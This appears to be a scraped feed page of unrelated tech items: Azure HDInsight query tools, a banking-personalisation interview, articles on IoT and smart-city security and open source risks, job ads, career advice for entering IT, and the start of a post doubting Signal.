Browse databases. Write queries or browse query results in full-screen mode, which can be particularly helpful with complex queries or large query results. Manage query execution jobs and history. View existing databases, tables, and their statistics. Create/upload tables and export table DDL to source control. View visual explain plans to learn more about query plan.

To learn more please see Use Hive View with Hadoop in Azure HDInsight .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Beeline

Beeline is a Hive client that is included on the head nodes of HDInsight cluster. Beeline uses JDBC to connect to HiveServer2, a service hosted on HDInsight cluster. You can also use Beeline to access Hive on HDInsight remotely over the internet. To learn more please see Use Hive with Hadoop in HDInsight with Beeline .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Hive ODBC

Open Database Connectivity (ODBC) API, a standard for the Hive database management system, enables ODBC compliant applications to interact seamlessly with Hive through a standard interface. Learn more about how HDInsight publishes HDInsight Hive ODBC driver .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Tableau

Tableau is very popular data visualization tool. Customers can build visualizations by connecting Tableau with HDInsight interactive Query.


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Apache DBeaver

Apache DBeaver is SQL client and a database administration tool. It is free and open-source (ASL). DBeaver use JDBC API to connect with SQL based databases. To learn more, see How to use DBeaver with Azure #HDInsight .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Excel

Microsoft Excel is the most popular data analysis tool and connecting it with big data is even more interesting for our customers. Azure HDInsight Interactive Query cluster can be integrated with Excel with ODBC connectivity.To learn more, see Connect Excel to Hadoop in Azure HDInsight with the Microsoft Hive ODBC driver .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Try HDInsight now

We hope you will take full advantage fast query capabilities of HDInsight Interactive Query using your favorite tools. We are excited to see what you will build with Azure HDInsight. Read this developer guide and follow the quick start guide to learn more about implementing these pipelines and architectures on Azure HDInsight. Stay up-to-date on the latest Azure HDInsight news and features by following us on Twitter #HDInsight and @AzureHDInsight . For questions and feedback, please reach out to AskHDInsight@microsoft.com .

About HDInsight

Azure HDInsight is Microsoft’s premium managed offering for running open source workloads on Azure. Azure HDInsight powers mission critical applications ranging in a wide variety of sectors including, manufacturing, retail education, nonprofit, government, healthcare, media, banking, telecommunication, insurance, and many more industries ranging in use cases from ETL to Data Warehousing, from Machine Learning to IoT, and more.

Additional resources Get started with HDInsight Interactive Query Cluster in Azure . Zero
          One-to-One at Scale: The Confluence of Behavioral Science and Technology and How It’s ...      Cache   Translate Page   Web Page Cache   

Consumer and business customers have increasing expectations that businesses provide products and services customized for their unique needs. Adaptive intelligence and machine learning technology, combined with insights into behavior, make this customization possible. The financial services industry is moving aggressively to take advantage of these new capabilities. In March 2018, Bank of America launched Erica, a virtual personal assistant—a chatbot—powered by AI. In just three months, Erica surpassed one million users.

But to achieve personalization at scale requires an IT infrastructure that can handle huge amounts of data and process it in real time. Engineered systems purpose-built for these cognitive workloads provide the foundation that helps make this one-to-one personalization possible.

Bradley Leimer, Managing Director and Head of Fintech Strategy at Explorer Advisory & Capital, provides consulting and investment advisory services to start-ups, accelerators, and established financial services companies. As the former Head of Innovation and Fintech Strategy at Santander U.S., his team connected the bank to the fintech ecosystem. Bradley spoke with us recently about how behavioral science is evolving in the financial services industry and how new technological capabilities, when tied to human behavior, are changing the way organizations respond to customer needs.

I know you’re fascinated by behavioral science. How does it frame what you do in the financial sector?

Behavioral science is fascinating because the study of human behavior itself is so intriguing. One of the many books I was influenced by early in my career was Paco Underhill’s 1999 book Why We Buy. The science around purchase behavior and how companies leverage our behavior to create buying decisions that fall in their favor—down to where products are placed and the colors that are used to attract the eye—these are techniques that have been used since before the Mad Men era of advertising.

I’m intrigued by the psychology behind the decisions we make. People are a massive puzzle to solve at scale. Humans are known to be irrational, but they are irrational in predictable ways. Leveraging behavioral science, along with things like design thinking and human-computer interaction, have been a part of building products and customer experiences in financial services for some time. To nudge customers to sign up for a service or take an additional product or to perform behaviors that are sometimes painful like budgeting, saving more, investing, consolidating, or optimizing the use of credit all involve deeply understanding human behavior.

Student debt reached $1.5 trillion in Q1 2018. Can behavioral analytics be used to help students better manage their personal finances?

What’s driving this intersection between behavioral science and fintech?

Companies have been using the ideas of behavioral science in strategic planning and marketing for some time, but it’s only been in the last decade that the technology to act upon the massive amount of new data we collect has been available. The type of data we used to struggle to plug into a mainframe through data reels now flies freely within a cloud of shared service layers. So beyond new analytic tools and AI, there are few other things that are important.

People interact with brands differently now. To become a customer now in financial services, it most often means that you’re interacting through an app, or a website, not in any physical form. It’s not necessarily how a branch is laid out anymore; it’s how the navigation works in your application, and what you can do in how few steps, how quickly you can onboard. This is what is really driving the future of revenue opportunity in the financial space.

At the same time, the competition for customers is increasing. Investments in the behavioral science area are a must-have now because the competition gets smarter every day and the applications to understand human behavior are simultaneously getting more accessible. We use behavioral science to understand and refine our precious opportunities to build empathy and relationships. 

You’ve mentioned the evolution of behavioral science in the financial services industry. How is it evolving and what’s the impact?

Behavioral science is nothing without the right type of pertinent, clean data. We have entered the era of engagement banking: a marketing, sales, and service model that deploys technology to achieve customer intimacy at scale. But humans are not just 1’s and 0’s. You need a variety of teams within banks and fintechs to leverage data in the right way, to make sure it addresses real human needs.

The real impact of these new tools has only started to be really felt. We have an opportunity to broaden the global use of financial services to reduce the number of the underbanked, to open new markets for payments and credit, to optimize every unit of currency for our customers more fully and lift up a generation by ending poverty and reducing wealth inequality.

40% of Americans could not come up with $400 for an emergency expense. Behavioral science can help move people move out of poverty and reduce wealth inequality.

How does artificial intelligence facilitate this evolution?

Financial institutions are challenged with innovating a century-old service model, and the addition of advanced analytics, artificial intelligence tools and how they can be used within the enterprise is still a work in progress. Our metamorphosis has been slowed by the dual weight of digital transformation and the broader implications of ever-evolving customers.

Banks have vast amounts of unstructured and disparate data throughout their complicated, mostly legacy, systems. We used to see static data modeling efforts based on hundreds of inputs. That’s transitioned to an infinitely more complex set of thousands of variables. In response, we are developing and deploying applications that make use of machine learning, deep learning, pattern recognition, and natural language processing among other functionalities.

Using AI applications, we have seen efficiency gains in customer onboarding/know-your-customer (KYC), automation of credit decisioning and fraud detection, personalized and contextual messaging, supply-chain improvements, infinitely tailored product development, and more effective communication strategies based on real-time, multivariate data. AI is critical to improving the entire lifecycle of the customer experience.

What’s the role of behavioral analytics in this trend?

Behavioral analytics combines specific user data: transaction histories, where people shop, how they manage their spending and savings habits, the use of credit, historical trends in balances, how they use digital applications, how often they use different channels like ATMs and branches, along with technology usage data like navigation path, clicks, social media interactions, and responsiveness to marketing. It takes a more holistic and human view of data, connecting individual data points to tell us not only what is happening, but also how and why it is happening.

You’ve built out these customization and personalization capabilities in banks and fintechs. Tell us about the basic steps any enterprise can take to build these capabilities.

As an organization, you need to clearly define your business goals. What are the metrics you want to improve? Is it faster onboarding, lower cost of acquisition, quicker turn toward profitable products, etc.? And how can a more customer-centric, personalized experience assist those goals?

As you develop these, make sure you understand who needs to be in the room. Many banks don’t have a true data science team, or they are a sort of hybrid analytical marketing team that has many masters. That’s a mistake. You need deep understanding of advanced analytics to derive the most efficiencies out of these projects. Then you need a strong collaborative team that includes marketing, digital banking, customer experience, and representation from those teams that interacts with clients. Truly user-centric teams leverage data to create a complete understanding of their users’ challenges. They develop insight into what features their customers use and what they don’t and build knowledge of how customers get the most value out of their products. And then they continually iterate and adjust.

You also need to look at your partnerships, including those with fintechs. There are several lessons derived from fintech platforms such as attention to growth through business model flexibility, devotion to speed-to-market, and a focus on creating new forms of customer value through leveraging these tools to customize everything from onboarding to the new user experience as well as how they communicate and customize the relationship over time.

What would be the optimum technology stack to support real-time contextual messages, products, or services?

Choosing the right technology stack for behavioral analytics is not that different than for any other type of application. You have to find the solution that maps most economically and efficiently to your particular problem set. This means implementing a technology that can solve the core business problems, can be maintained and supported efficiently, and minimizes your total cost of ownership.

In banking, it has to reduce risk while maximizing your opportunities for success. The legacy systems that many banks still deploy were built on relational databases and not designed for real-time processing, providing access via Restful APIs and the cloud-based data lakes we see today. Nor did they have the ability to connect and analyze any form of data. The types of data we now have to consider is just breathtaking and growing daily. In choosing technology partners, you want to make sure what you’re buying is built for this new world from the beginning, that the platform is flexible. You have to be able to migrate between on-premises solutions to the cloud, along with a variety of virtual machines being used today.

If I can paraphrase what you’re saying, it’s that financial services companies need a big data solution to manage all these streams of structured and unstructured data coming in from AI/ML, and other advanced applications. Additionally, a big data solution that simplifies deployment by offering identical functionality on-premises, in the cloud, and in the Oracle public Cloud behind your firewall would also be a big plus.

Are there any other must-haves in terms of performance, analytics, etc., to build an effective AI-based solution?

Must-haves include flexibility to consume all types of data, especially that which is gathered from the web and from digital applications. It needs to be very good at data aggregation—that is, reducing large data sets down to more manageable proportions that are still representative. It must be good at transitioning from aggregation to the detail level and back to optimize different analytical tools. It should be strong in quickly identifying cardinality—how many types of variables can there be within a given field.

Some other things to look for in a supporting infrastructure are direct access through query tools (SQL), support for data transformation within the platform (ETL and ELT tools), flexible data model or unstructured access to all data, algorithmic data transformation, ability to add and access one-off data sets simply (like through ODBC), flexible ways to use APIs to load and extract information, that kind of thing. A good system needs to be real time to help customers in taking the most optimized journey within digital applications. 

To wrap up our discussion, what three tips would you give the enterprise IT chief about how to incorporate these new AI capabilities to help the organization reach its goals around delivering a better customer experience?

First, realize that this isn’t just a technology problem—it will require engineers, data scientists, system architects and data specialists sure, but you also need a collaborative team that involves many parts of the business and builds tools that are accessible.

Start with simple KPIs to improve. Reducing the cost of acquisition or improving onboarding workflows, improving release time for customer-facing applications, reducing particular types of unnecessary customer churn—these are good places to start. They improve efficiencies and impact the bottom line. They help build the case around necessary new technology spend and create momentum.

Understand that the future of the financial services model is all about the customer—understanding their needs and helping the business meet them. Our greatest source of innovation is, in the end, our empathy.

You’ve given us a lot to think about, Bradley. Based on our discussion, it seems that the world of financial services is changing and banks today will require an effective AI-based solution that leverages behavioral science and personalization capabilities.

Additionally, in order for banks to sustain a competitive advantage and lead in the market, they need to invest an effective big data warehousing strategy. Therefore, business and IT leaders need a solution that can store, acquire, process large data workloads at scale, and has cognitive workload capabilities to give you the advanced insights needed to run your business most effectively. It is also important that the technology is tailor-made for advancing businesses’ analytical capabilities that leverage familiar big data and analytics open source tools. And Oracle Big Data Appliance provides that high-performance, cloud-ready secure platform for running diverse workloads using Hadoop, Spark, and NoSQL systems. 


          The Cathedral Amp Bazaar Musings On Linux And Open Source By An Accidental Revolutionary Eric S Raymond       Cache   Translate Page   Web Page Cache   
Dcument Of The Cathedral Amp Bazaar Musings On Linux And Open Source By An Accidental Revolutionary Eric S Raymond
          The Internet of Things Needs Food Safety-Style Ratings for Privacy and Security      Cache   Translate Page   Web Page Cache   

By now, we’re all intimately-familiar with the comically-bad security and privacy standards that plague most modern, internet-connected devices in the internet of things era.

Thanks to companies and evangelists that prioritize profits over privacy and security, your refrigerator can now leak your gmail credentials , your kids' Barbie doll can now be used as a surveillance tool , and your Wi-Fi-enabled tea kettle can open your wireless network to attack .

The paper-mache grade security on many of these devices also makes it trivial to quickly compromise and integrate them into botnets, resulting in the rise in historically-unprecedented DDoS attacks over the last few years. Security is so lacking, many devices can be hacked and integrated into botnets in a matter of just minutes once connected to the internet.

Security researchers like Bruce Schneier have dubbed this a sort of “ invisible pollution .” Pollution, he notes, nobody wants to address because neither the buyer or seller in this chain of dysfunction tends to give much of a damn.

“The owners of those devices don't care,” notes Schneier. “Their devices were cheap to buy, they still work, and they don't even know (the victims of DDoS attacks). The sellers of those devices don't care: they're now selling newer and better models, and the original buyers only cared about price and features.”

In short the market has failed, creating millions of new potential attack vectors annually as an ocean of such devices are mindlessly connected to the internet.

One potential solution? To incorporate security and privacy grades in all product and service reviews moving forward.

“Until now, reviewers have primarily focused on how smart gadgets work, but not how they fail: it's like reviewing cars but only by testing the accelerator, and not the brakes,” activist and author Cory Doctorow told Motherboard.

“The problem is that it's hard to tell how a device fails,” Doctorow said. “‘The absence of evidence isn't the evidence of absence,’ so just because you don't spot any glaring security problems, it doesn't mean there aren't any.”

Countless hardware vendors field products with absolutely zero transparency into what data is being collected or transmitted. As a result, consumers can often find their smart cameras and DVRs participating in DDOS attacks, or their televisions happily hoovering up an ocean of viewing data , which is then bounced around the internet sans encryption .

Product reviews that highlight these problems at the point of sale could go a long way toward discouraging such cavalier behavior toward consumer welfare and a healthy internet, pressuring companies to at least spend a few fleeting moments pretending to care about privacy and security if they value their brand reputation.

To that end, Consumer Reports announced last year it would begin working with non-profit privacy research firm Ranking Digital Rights (RDR) and nonprofit software security-testing organization Cyber Independent Testing Lab (CITL) on a new open source standard intended to help make internet-connected hardware safer.

“If Consumer Reports and other public-interest organizations create a reasonable standard and let people know which products do the best job of meeting it, consumer pressure and choices can change the marketplace. We’ve seen this repeatedly over our 80-year history,” the group argued.

This week, those efforts began taking shape.

Consumer Reports’ latest rankings of mobile payment platforms is the first time security and privacy have factored into the organization’s ratings for any product or service. It’s a practice Geoffrey MacDougall, Consumer Reports' head of partnership and strategy, says will soon be expanded to the organization’s reviews of internet-connected products.


The Internet of Things Needs Food Safety-Style Ratings for Privacy and Security

Such a practice being standardized in service and hardware reviews could go a long way in addressing things like “smart” televisions that spend as much time watching you as you do watching them, or internet-connected door locks that leave you less secure than the dumb alternatives they were supposed to supplant.

Doctorow calls the Consumer Reports’ effort both “welcome and long overdue,” but notes it needs to be the first step in a broader reform campaign.

Passing meaningful consumer privacy rules, like the FCC broadband protections killed by Congress last year , will also play a role. As will efforts to improve transparency, like the Princeton computer science department’s IOT Inspector , which provides the end user with more insight into what IoT devices are actually up to online.

Thwarting efforts by numerous companies to punish and intimidate security researchers also needs to be addressed, notes Doctorow.

“I think the next logical step is to start explicitly calling out companies that reserve the right to sue security researchers through laws like Section 1201 of the DMCA and the Computer Fraud and Abuse Act,” he said. “We know from long experience that just the possibility of retaliation

for criticizing products by pointing out their defects is enough to chill the speech of security researchers.”

For years the internet of things space has been the butt of justified jokes , as we collectively laugh at how we need to approve an overlong TOS just to use our shiny new oven , or the fact we can’t use our thermostat or TV because they were infected by ransomware.

But researchers like Schneier have warned that with millions of new attack vectors being introduced annually thanks to apathetic companies and oblivious consumers, it’s only a matter of time before this systemic dysfunction results in some massive, potentially fatal attacks on essential infrastructure .

With that understood, helping consumers better understand which companies couldn’t care less about privacy and security seems like the very least we can do.


          5 Open Source Security Risks You Should Know About      Cache   Translate Page   Web Page Cache   

By giving developers free access to well-built components that serve important functions in the context of wider applications, the open source model speeds up development times for commercial software by making it unnecessary to build entire applications completely from scratch.

However, with research showing that 78 percent of audited codebases contained at least one open source vulnerability, of which 54 percent were high-risk ones that hackers could exploit, there is clear evidence that using open source code comes with security risks. Such risks often don’t arise due to the quality of the open source code (or lack thereof) but due to a combination of factors involving the nature of the open source model and how organizations manage their software.

Read on to find out the five open source security risks you should know about.

Publicity of Exploits

The nature of the open source model is that open source projects make their code available to anybody. This has the advantage that the open source community can flag potential exploits they find in the code and give open source project managers time to fix the issues before publicly revealing information on vulnerabilities.

However, eventually such exploits are made publicly available on the National Vulnerability Database (NVD) for anyone to view. Hackers can use the publicity of these exploits to their advantage by targeting organizations that are slow to patch the applications that may be dependant on open source projects with recent vulnerabilities.

A pertinent example of issues due to publicly available exploits was the major Equifax breach in 2017 wherein the credit reporting agency exposed the personal details of 143 million people. The reason the exposure occurred was that attackers noticed Equifax used a version of the open source Apache Struts framework which had a high-risk vulnerability, and the hackers used that information to their advantage.

Dealing with this risk from the organization perspective means recognizing that open source exploits are made vulnerable and that hackers stand to gain a lot from attempting to breach services that use vulnerable components. Update as quickly as possible or pay the consequences.

Difficulty Managing Licenses

Single proprietary applications are often composed of multiple open source components, the projects for which are released under any of several license types, such as Apache License, GPL, or MIT License. This leads to difficulty in managing open source licenses considering the frequency with which enterprises develop and release software and the fact that over 200 open source license types exist.

Organizations are required to comply with all individual terms of different licenses, and non-compliance with the terms of a license puts you at risk of legal action, potentially damaging the financial security of your company.

Tracking licenses manually is prohibitively time-consuming―consider a software composition analysis tool that can automatically track all of the different open source components and licenses you use in your applications.

Potential Infringement Issues

Open source components may introduce intellectual property infringement risks because these projects lack standard commercial controls, giving a means for proprietary code to make its way into open source projects. This risk is evident in the real-world case of SCO Group , who contended that IBM stole part of the UnixWare source code and used it for their Project Monterey and sought billions of dollars in damages.

Appropriate due diligence into open source projects can flag up potential infringement risks.

Operational Risks

One of the main sources of risks when using open source components in the enterprise comes from operational inefficiencies. Of primary concern from an operational standpoint is the failure to track open source components and update those components as new versions become available. These updates often address high-risk security vulnerabilities, and delays can cause a catastrophe, as was the case in the Equifax breach.

It’s vital, therefore, to keep an inventory of your open source usage across all your development teams, not only to ensure visibility and transparency, but to avoid different teams using different versions of the same component. Keeping an inventory needs to become part of a dedicated policy on open source usage, and software composition analysis tools provide a means to enforce this practice in an automated, easily manageable way without manually updating spreadsheets.

Another issue is abandoned projects that perhaps begin with much active involvement from the open source community but eventually peter out until nobody updates them anymore. If such projects make their way into apps in the form of libraries or frameworks, your developers are responsible for fixing future vulnerabilities. Part of good inventory management is to track projects that are updated infrequently.

Developer Malpractices

Some security risks arise due to developer malpractices, such as copying and pasting code from open source libraries. Copying and pasting is an issue firstly because you copy any vulnerabilities that may exist in the project’s code when you do it, and secondly because there is no way to track and update a code snippet once it’s added to your codebase, making your applications susceptible to potential future vulnerabilities that arise. You can avoid this issue by creating an open source policy that specifically forbids copying and pasting snippets directly from projects to your application codebases.

Another malpractice that can occur is the manual transfer via email of open source components across teams. This is opposed to the recommended best practice which is to use a binary repository manager or a shared, secure network location for transferring components.

Conclusion

Open source is a highly useful model that deserves its current standing as the bedrock of the development of many modern applications. However, smart use of open source components involves acknowledgment of the security risks involved in using these components in your applications and prudent, proactive action to minimize the chances of these risks affecting your organization directly.


          The Sensors That Power Smart Cities Are a Hacker's Dream      Cache   Translate Page   Web Page Cache   

At this point, it seems like every so-called consumer smart device―fromrouters andbaby monitors to connected thermostats andgarage door openers―has been shown to have vulnerabilities . But that same security crisis has also played out on a macro scale, exposing municipal works and public safety sensors to manipulation that could destabilize traffic lights, undermine radiation sensors, or even create a calamity like causing a dam to overflow because of tainted water level data.

Researchers from IBM Security and data security firm Threatcare looked at sensor hubs from three companies―Libelium, Echelon, and Battelle―that sell systems to underpin smart city schemes. Smart city spending worldwide is estimated to reach about $81 billion globally in 2018, and the three companies all have different areas of influence. Echelon, for example, is one of the top suppliers of smart street lighting deployments in the world.

Fundamentally, though, the systems the researchers analyzed are similar. By setting up an array of sensors and integrating their data, a municipality can get more nuanced insight into how to solve interconnected problems. These sensors monitor things like weather, air quality, traffic, radiation, and water levels, and can be used to automatically inform fundamental services like traffic and street lights, security systems, and emergency alerts.

'When they fail, it could cause damage to life and livelihood.'

Daniel Crowley, IBM X-Force Red

That last one might sound familiar; an accidental missile alert in January sent Hawaii's residents scrambling, while a hack set off Dallas's tornado sirens last year. In fact, those incidents and others like it inspired Daniel Crowley of IBM X-Force Red and Jennifer Savage of Threatcare to investigate these systems in the first place. What they found dismayed them. In just their initial survey, the researchers found a total of 17 new vulnerabilities in products from the three companies, including eight critical flaws.

“The reason we wanted to focus on hubs was that if you control the central authority that runs the whole show then you can manipulate a lot of information that’s being passed around,” Crowley says. “It appears to be a huge area of vulnerability, and the stakes are high when we’re talking about putting computers in everything and giving them important jobs like public safety and management of industrial control systems. When they fail, it could cause damage to life and livelihood and when we’re not putting the proper security and privacy measures in place bad things can happen, especially with a motivated and resourced attackers.”

The researchers found basic vulnerabilities, like guessable default passwords that would make it easy for an attacker to access a device, along with bugs that could allow an attacker to inject malicious software commands, and others that would allow an attacker to sidestep authentication checks.

Many smart city schemes also use the open internet, rather than an internal city network, to connect sensors or relay data to the cloud, potentially leaving devices exposed publicly for anyone to find. Simple checks on IoT crawlers like Shodan and Censys yielded thousands of vulnerable smart city products deployed in the wild. The researchers contacted officials from a major US city that they found using vulnerable devices to monitor traffic, and a European country with at-risk radiation detectors.

"I live in a city that’s starting to implement smart city devices," Threatcare's Savage says. "We bought a house here and we can choose not to have IoT devices in our home, we can go out of our way to buy a dumb TV not a smart TV. But I can’t control if there are street lights with cameras baked into them right outside my house and I have no control over the vehicle hub that my city might be using. It gets to me as a security researcher that a city might be making these types of decisions for me."

The three companies have made patches available for all 17 bugs. Echelon, whose smart city offerings include not just lighting but also building automation and transportation, says it collaborated with IBM to resolve its issues. "Echelon confirmed the vulnerability, developed mitigation solutions, notified customers, and informed DHS ICS-CERT," spokesperson Thomas Cook told WIRED, referring to the Department of Homeland Security's Computer Emergency Readiness Team, which tracks vulnerabilities.

Battelle spokesperson Katy Delaney noted that the group is a technology development nonprofit, and that the vulnerability IBM researchers found was in an open source smart city hub collaboration with the Federal Highway Administration that hasn't yet been deployed. "We appreciate IBM bringing their considerable resources to bear in finding these potential security issues," Delaney told WIRED. "We wanted feedback and we appreciate the scrutiny, improvement, and help." Libelium, a Spanish company with extensive smart city offerings, could not be reached for comment.

'It gets to me as a security researcher that a city might be making these types of decisions for me.'

Jennifer Savage, Threatcare

While having patches available for all the flaws is a crucial step, the researchers note the importance of raising awareness about these problems to make sure that municipalities are prioritizing patching, which organizations so often don’t . The smart city hubs the researchers looked at don’t have automatic update capabilities, a common setup on industrial control devices since a buggy update could destabilize vital infrastructure . But the downside is that every entity using these products will need to proactively apply the patches, or devices in the wild will continue to be vulnerable.

And while the researchers emphasize that they don't have evidence of any of the bugs they found being abused, they did discover that someone posted an exploit for one of the flaws on a hacker forum in August 2015. "There are people out there who aren’t white hat hackers who have had at least one of these exploits for ages and who knows what they’ve done with it," Savage says. "This is something that people have been looking into."

Industrial control hacking has recently become a major focus of nation state attackers, for instance, with Russia taking the most prolific known interest. State-sponsored Russian hackers haveprobed US grid and election infrastructure and have wreaked havoc overseas, causing two blackouts in Ukraine and compromising payment systems in the country with malware campaigns. As the risk grows worldwide, US officials have increasingly acknowledged the vulnerability of US infrastructure, and agencies like the Department of Homeland Security are scrambling to implement systemic safeguards.

Cities will continue to invest in smart technology. Hopefully as they do, they'll appreciate that more data will often mean more risks―and that those vulnerabilities aren't always easy to fix.

More Great WIRED Stories In nature, Google Lens does what the human brain can’t Crying ‘pedophile‘ is the oldest propaganda trick around The wild inner workings of a billion-dollar hacking group Inside the23-dimensional world of your car’s paint job Crispr and the mutant future of food Looking for more? Sign up for our daily newsletter and never miss our latest and greatest stories
          Front End Web Developer      Cache   Translate Page   Web Page Cache   
OR-Beaverton, Acara Solutions is looking for Front End Web Developer for our client located Beaverton, OR Create responsive layouts and mobile-specific web applications Develop web solutions using JQuery, HTML5, CSS, SASS Research and deploy new web-based technologies including open source Maintain and modify legacy code in existing web apps Work with other team members to address UI or workflow issues to creat
          Software Developer - Varian Medical Systems - Winnipeg, MB      Cache   Translate Page   Web Page Cache   
Java, JavaScript/TypeScript, Angular, Python. Specialization in Java or other open source Web Application stack....
From Varian Medical Systems - Fri, 03 Aug 2018 06:07:59 GMT - View all Winnipeg, MB jobs
          Compensation Consultant - Elastic - Seattle, WA      Cache   Translate Page   Web Page Cache   
At Elastic, we have a simple goal: to take on the world's data problems with products that delight and inspire. As the company behind the popular open source...
From Elastic - Mon, 23 Jul 2018 18:41:03 GMT - View all Seattle, WA jobs
          Open Source Software Market to 2025 - Intel, Epson, IBM, Transcend, Oracle, Acquia, Actuate, Alfresco Software Inc, Astaro Corp      Cache   Translate Page   Web Page Cache   
(EMAILWIRE.COM, August 09, 2018 ) Research N Reports published a new industry research that focuses on Open Source Software market and delivers in-depth market analysis and future prospects of Global Open Source Software market. The study covers significant data which makes the research document...
          How to Install InvoicePlane on Ubuntu 18.04 LTS      Cache   Translate Page   Web Page Cache   

InvoicePlane is a free, open source and self-hosted application for managing your invoices, clients, and payments.


          awscli (1.15.75)      Cache   Translate Page   Web Page Cache   
The AWS CLI is an open source tool built on top of the AWS SDK for Python (Boto) that provides commands for interacting with AWS services.

          How Do You Start In The Tech Sector?      Cache   Translate Page   Web Page Cache   

How Do You Start In The Tech Sector?
Career

August 9th, 2018

The tech sector, if you know what you're doing, is easier than most fields to get started in. However, you do have to know what you're doing. In this post, I'm going to step through a series of ways to get started, in case you're not sure.

Sounds easy, right? Well, nothing worthwhile's easy. Now, to be fair, I don't mean " if you know what you're doing " in any patronising or condescending way.

What I mean is that, unlike say being a GP , dentist , civil engineer , corporate lawyer , Queen's Council (QC) , etc., you don't need to have years of formal training.

What’s more, you don’t need to be registered with an industry group/board before you're allowed to work. These can include the Institute of Chartered Accountants , the Queensland Law Society , or the Queensland Bar Association .

In IT, however, most people whom I've spoken to over the years care far more for what you can do, rather than what a piece of paper says you could do.

Let's Say You Want to Write Code
How Do You Start In The Tech Sector?

If you want to write code, then start by learning the basics of a software development language. I'm not going to get into a flame war about one language or another, whether one's better than another or not.

That's for people with too much time on their hands, and for people who are too emotionally invested in their language(s) of choice ― or dare I say, just a bit insecure.

There are a host of languages to choose from, readily available on the three major operating systems ( linux , macOS , and windows ). Some of the most common, where you'll find the most amount of help and documentation, are php , Perl , C/C++ , Java , Go , Ruby , python , Haskell , and Lisp . Grab yourself and editor, or an IDE, learn it inside out, and get started learning to write code.

I've linked to a host of excellent online resources for each at the end of the article.

For my part, I prefer any language borne out of C/C++. I've written code in Visual Basic and Cobol and didn't come away from either experience positively.

Once you've learned the basics, start contributing to an open source project! You don't need to be overly ambitious, so the project doesn't need to be a big one.

It could be a small library, such as VIM for Technical Writers that I maintain every so often. It could, however, be the Linux Kernel too, if that's your motivation and you are feeling particularly ambitious.

Regardless of what you choose, by contributing to these projects you'll learn far faster and better than you likely could in any other way. Why?

Because you're working on real projects and have the opportunity to be mentored by people who have years of hands-on experience. You'll get practical, guided experience, the kind you'd likely take years to acquire on your own.

They'll help teach you good habits, best practices, patterns, techniques, and so much more; things you'd likely take ages to hear about, let alone learn.

What's more, you'll become part of a living, breathing community where ― hopefully ― you're encouraged to grow and appreciate the responsibilities and requirements of what it takes to ship software.

But I'd Rather Be a Systems Administrator?
How Do You Start In The Tech Sector?

The same approach can be broadly applied. Here’s my suggestion. Install a copy of Linux , BSD , or Microsoft Windows on an old PC or laptop. As you're installing it, have a look around at the tools that are available for it

hint:open source provides a staggering amount of choice. #justsayin .

Get to know how it's administered, whether via GUI tools (and the Power Shell) on Windows, or via the various daemons and their configuration files and command-line tools on Linux and BSD.

Server administration's a pretty broad topic, so it's hard ― if not downright impossible ― to suggest a specific set of tools to learn. I'm encouraging you at this point to get a broad understanding.

Later, if you're keen, you can specialise in a particular area. However, for now, get a broad understanding of:

Networking User and Group Management Installation Options and Tooling Service/Daemon configuration; and Disk Management.

Whether you're on Linux, BSD, or Windows, I've linked to a host of resources at the bottom of the article to help get you started.

Now that you've learned the fundamentals do something where people can critique you and hold you accountable, such as hosting a website of your own, through a provider such as Digital Ocean , or Linode .

The web server you use, whether Apache , NGINX , Lighttpd , or IIS doesn't matter. Just use one that works well on your OS of choice.

Once you've got it up and running, start building on the day to day tasks required to keep it up and running nicely. Once you've grown some confidence, move on to learning how to improve the site's security and performance, and deployment process.

This can include:

Optimising the web server, filesystem, and operating system configuration setting for maximum throughput Setting up an intrusion detection system (IDS); and Dockerising your site To Go Open Source or Microsoft?

By now you've got a pretty good set of knowledge. However, stop for just a moment, because it's time to figure out if you're going to specialise in open source (Linux/UNIX/BSD) or whether you're going to focus around Microsoft's tools and technologies.

You can become knowledgeable in both, and most developers and systems administrators that I know do have a broad range of knowledge in both. However, I'd suggest that it's easier to build your knowledge in one rather than attempting to learn both.

Depending on the operating system you've been using up until now, it's likely that you've already made your choice. However, it's good to stop and deliberately think about it.

What Do You Do Next?

Now, let's get back to building your skills. What do you do next? If you want to be a sys admin, start look around for opportunities to help others with their hosting needs.

Don't go all in ― yet . There's no need to rush. Keep stepping up gradually , building your confidence and skills.

If you're not sure of who might need help, have a think about:

What clubs are you involved in? Do you have friends with small businesses that might need support? Do you know others who want to learn what you have and need a mentor? I'm sure that as you start thinking, you'll be able to uncover other ideas and possibilities. Now you have to get out of your comfort zone, contact people and ask them if they need help.

Worst case scenario, they say no. Whatever! Keep going until you find someone who does want help and is willing to take you on.

Regardless of the path that you take, you should feel pretty confident in your foundational skills, because they're based on practical experience.

So, it's time to push further. To do that, I'd suggest contacting a University, a bank, or an insurance provider, if you want to cut your teeth on big installations.

Sure, many other places have big server installations. However, these three are the first that come to mind.

If you are focused on software development, here are a few suggestions:

Contact software development companies (avoid " digital agencies ") and see if they’re hiring. Talk to your local chamber of commerce and industry and let them know you’re around and what you do. Find the local business networking groups and go to the networking breakfasts. Get involved in your local user groups (this goes for sys admins too, btw). Start a user group if there isn’t one for what you want to focus on. In Conclusion

I could go on and on. The key takeaway I'm trying to leave you with is that, if you have practical experience , you'll increase the likelihood of gaining employment.

Any employer I've had of any worth values hands-on experience over a piece of paper any day.

Don't get me wrong; there's nothing wrong with degrees or industry certifications. And for complete transparency:

I have a Bachelor of Information Technology I'm LPIC-1 certified; and I’m a Zend (PHP 5) Engineer

However, university qualifications and industry certifications should only reinforce what you already know, and not be something that is used to get your start.

With all that said, I want to encourage you to go down the Open Source path, not Microsoft. But I’m biased, as I’ve been using Linux since 1999.

Regardless, have a chew on all that, and let me know what you think in the comments. I hope that, if you’re keen to get into IT, that this helps you do so, and clears up one or more questions and doubts that you may have.

Further Reading Open Source
          Compensation Consultant - Elastic - Seattle, WA      Cache   Translate Page   Web Page Cache   
At Elastic, we have a simple goal: to take on the world's data problems with products that delight and inspire. As the company behind the popular open source...
From Elastic - Mon, 23 Jul 2018 18:41:03 GMT - View all Seattle, WA jobs
          I don’t trust Signal      Cache   Translate Page   Web Page Cache   

Occasionally when Signal is in the press and getting a lot of favorable discussion, I feel the need to step into various forums, IRC channels, and so on, and explain why I don’t trust Signal. Let’s do a blog post instead.

